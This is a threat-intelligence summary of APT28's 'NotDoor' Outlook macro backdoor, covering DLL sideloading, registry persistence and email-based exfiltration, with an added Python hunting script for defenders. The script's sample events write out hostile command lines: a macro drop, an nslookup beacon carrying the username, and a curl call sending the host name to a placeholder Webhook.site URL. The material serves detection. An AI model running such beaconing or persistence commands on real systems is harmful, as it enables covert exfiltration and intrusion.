2025-09-11

Russian State-Backed APT Leverages DLL Sideloading to Deliver Outlook-Based Backdoor

Level: Tactical | Source: Lab52 | Global


APT28 (also known as Fancy Bear and Forest Blizzard), a Russian state-aligned threat group, has been linked to a newly identified backdoor named “NotDoor,” discovered by Lab52's intelligence team at S2 Grupo. The analysis provided by S2 Grupo reports, "The artefact, dubbed NotDoor due to the use of the word ‘Nothing’ within the code, is a VBA macro for Outlook designed to monitor incoming emails for a specific trigger word. When such an email is detected, it enables an attacker to exfiltrate data, upload files, and execute commands on the victim’s computer." Victims include organizations across NATO member countries, suggesting a likely cyber-espionage objective. While the report attributes the activity to APT28, the methodology behind the attribution remains unclear.

The delivery mechanism begins with a file named "testtemp.ini" staged in the "C:\ProgramData" directory. Execution is initiated by abusing DLL sideloading through Microsoft OneDrive.exe to load a malicious "SSPICLI.dll" file. This DLL is responsible for installing the Outlook macro, enabling persistence, and disabling multiple macro protections. Execution of "SSPICLI.dll" is carried out by "rundll32.exe" from a directory in which that DLL is not normally found, followed by several PowerShell commands encoded in Base64. One command copies the malicious macro into the Outlook startup location as "VbaProject.OTM", another executes an "nslookup" query with the username appended to a domain using DNSHook, and a third sends a "curl" request with identifying information to a hardcoded Webhook[.]site address. These steps are likely used for beaconing and confirming successful deployment.

Additional process activity includes the use of "loaddll64.exe" and multiple spawned "conhost.exe" and "cmd.exe" instances. These are used to facilitate repeated execution of "rundll32.exe" with the malicious DLL payload, PowerShell scripts, and curl-based data exfiltration. Registry modifications are also made to ensure persistence: enabling the "LoadMacroProviderOnBoot" registry key and modifying Outlook security settings to allow macros without user prompts. Outlook dialog boxes are also suppressed to reduce user awareness. Once installed, the backdoor monitors for emails containing a configurable trigger string (e.g., “Daily Report”), after which it parses the message for commands and deletes the trigger email to erase evidence.
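The process, PowerShell and registry indicators in the two paragraphs above map directly onto hunting rules. The following Python is an added example, not code from Lab52, S2 Grupo or Anvilogic; it runs three rules over constructed Sysmon-style events (a rundll32 launch of the staged DLL, an OneDrive.exe sideload, two encoded PowerShell commands and a registry value set). The event field names, the user SID, the beacon domain, the webhook path and the `Security\Level` registry value are assumptions; only `LoadMacroProviderOnBoot`, the file names and the Webhook[.]site domain come from the report.

```python
"""Hunt logic for the NotDoor delivery chain described above, run over constructed
Sysmon-style telemetry. Example code added to this summary, not Lab52's or
Anvilogic's tooling; the registry path, user SID and beacon domain are assumptions."""
import base64
import re

SYSTEM32 = r"c:\windows\system32"

# Artefact names the summary mentions; a hit inside decoded PowerShell is a finding.
NOTDOOR_MARKERS = ("testtemp.ini", "vbaproject.otm", "nslookup", "webhook.site")
# Outlook values touched for persistence: LoadMacroProviderOnBoot is named in the report;
# Security\Level is the assumed location of the "allow macros without prompting" setting.
OUTLOOK_REG_PATTERNS = (r"\outlook\loadmacroprovideronboot", r"\outlook\security\level")


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse encode_ps; returns "" for anything that is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


# Constructed sample events (not real telemetry); "id" mimics the Sysmon event ID.
SAMPLE_EVENTS = [
    # Event 1: rundll32 handed a DLL staged under ProgramData (abnormal path for SSPICLI.dll)
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\SSPICLI.dll,Entry"},
    # Event 7: OneDrive.exe resolving SSPICLI.dll from its own folder instead of System32
    {"id": 7, "image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\SSPICLI.dll"},
    # Event 7, benign: the legitimate SSPICLI.dll from System32 must not fire
    {"id": 7, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\SSPICLI.dll"},
    # Event 1: encoded PowerShell dropping the macro as VbaProject.OTM
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         r"Copy-Item C:\ProgramData\testtemp.ini $env:APPDATA\Microsoft\Outlook\VbaProject.OTM")},
    # Event 1: encoded PowerShell beacon (assumed domain and placeholder webhook path)
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + encode_ps(
         'nslookup "$env:USERNAME.example.invalid"; '
         'curl.exe https://webhook.site/PLACEHOLDER-ID -d $env:COMPUTERNAME')},
    # Event 13: registry value set so Outlook loads the macro provider at startup (assumed SID)
    {"id": 13, "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Outlook"
               r"\LoadMacroProviderOnBoot",
     "details": "DWORD (0x00000001)"},
    # Event 1, benign: plain PowerShell with nothing encoded
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]


def analyze(events):
    """Return one finding dict per rule hit across a list of event dicts."""
    findings = []
    for ev in events:
        image = ev.get("image", "").lower()
        cmdline = ev.get("cmdline", "")
        text = " ".join(str(ev.get(k, "")) for k in ("cmdline", "loaded"))

        # Rule 1: SSPICLI.dll resolved from anywhere but System32, whether passed to
        # rundll32 on the command line or sideloaded by OneDrive.exe from its own folder.
        for dll in re.findall(r"[a-z]:\\[^\s,\"']*sspicli\.dll", text, re.I):
            if not dll.lower().startswith(SYSTEM32):
                findings.append({"rule": "sspicli_outside_system32", "image": image, "evidence": dll})

        # Rule 2: encoded PowerShell whose decoded body names a NotDoor staging or beacon artefact.
        if image.endswith("powershell.exe"):
            m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
            script = decode_ps(m.group(1)).lower() if m else ""
            for marker in NOTDOOR_MARKERS:
                if marker in script:
                    findings.append({"rule": "encoded_ps_notdoor_marker", "image": image, "evidence": marker})

        # Rule 3: registry value set (Sysmon event 13) on Outlook's macro-loading or security settings.
        target = ev.get("target", "").lower()
        if ev.get("id") == 13 and any(p in target for p in OUTLOOK_REG_PATTERNS):
            findings.append({"rule": "outlook_macro_registry", "image": image, "evidence": ev["target"]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['image']} :: {f['evidence']}")
```

Rule 1 keys on the DLL path rather than the loader, which is what makes it survive the two different delivery shapes the report describes (rundll32 with an explicit path, and OneDrive.exe picking up the DLL from its own directory); the System32 allow-list keeps the legitimate copy of SSPICLI.dll quiet. Rule 2 decodes the Base64 before matching, because the artefact names never appear in the raw command line.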

The macro-based backdoor supports several commands, including remote command execution, file upload, and file exfiltration via email attachments. It maintains a working directory under "%TEMP%\Temp" and sends data to attacker-controlled email addresses such as a.matti444@proton[.]me. Each exfiltrated file is encrypted using a custom encoding method involving modified Base64 strings, and filenames mimic typical business documents or media. This method allows APT28 to maintain long-term covert access and control while blending in with normal Outlook behavior. According to Lab52, the use of obfuscated macro code, registry-level persistence, and stealthy C2 communication indicates an enhancement in APT28’s tradecraft.
